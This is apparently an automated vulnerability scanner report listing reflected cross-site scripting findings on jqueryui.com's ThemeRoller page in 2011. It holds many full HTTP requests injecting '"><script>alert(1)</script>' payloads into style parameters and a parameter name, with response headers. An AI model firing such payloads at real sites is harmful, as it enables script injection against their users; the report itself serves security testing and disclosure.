GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serifc1d1e"><script>alert(1)</script>6798d84993f&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:13 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120176
The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d06c"><script>alert(1)</script>c2aa43a121c was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em2d06c"><script>alert(1)</script>c2aa43a121c&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:14 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 973a4"><script>alert(1)</script>cb8eec49bfe was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold973a4"><script>alert(1)</script>cb8eec49bfe&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:13 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120111
The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae84d"><script>alert(1)</script>80ac578362b was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01ae84d"><script>alert(1)</script>80ac578362b&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5ef9"><script>alert(1)</script>f2451ef5de1 was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bddc5ef9"><script>alert(1)</script>f2451ef5de1&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:29 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120176
The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8451"><script>alert(1)</script>ff0e6439862 was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5e8451"><script>alert(1)</script>ff0e6439862&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:37 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 880ad"><script>alert(1)</script>d64a7ef281d was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a880ad"><script>alert(1)</script>d64a7ef281d&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:55 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b3d2"><script>alert(1)</script>bf07ccca7fe was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f31b3d2"><script>alert(1)</script>bf07ccca7fe&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87d4a"><script>alert(1)</script>7cbe5359106 was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff87d4a"><script>alert(1)</script>7cbe5359106&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:52 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0c5a"><script>alert(1)</script>e6d1361b6b7 was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0f0c5a"><script>alert(1)</script>e6d1361b6b7&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:46 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
<meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" /> <meta nam ...[SNIP]... t=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0f0c5a"><script>alert(1)</script>e6d1361b6b7&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgI ...[SNIP]...
4.84. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://jqueryui.com
Path: /themeroller/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa2f3"><script>alert(1)</script>b0d24937c9e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?fa2f3"><script>alert(1)</script>b0d24937c9e=1 HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:24:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 117121
The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31ca4"><script>alert(1)</script>ef8babd57d1 was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px31ca4"><script>alert(1)</script>ef8babd57d1&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:26:05 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a2a1"><script>alert(1)</script>f8e2e66cbd8 was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px4a2a1"><script>alert(1)</script>f8e2e66cbd8&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:26:04 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120176
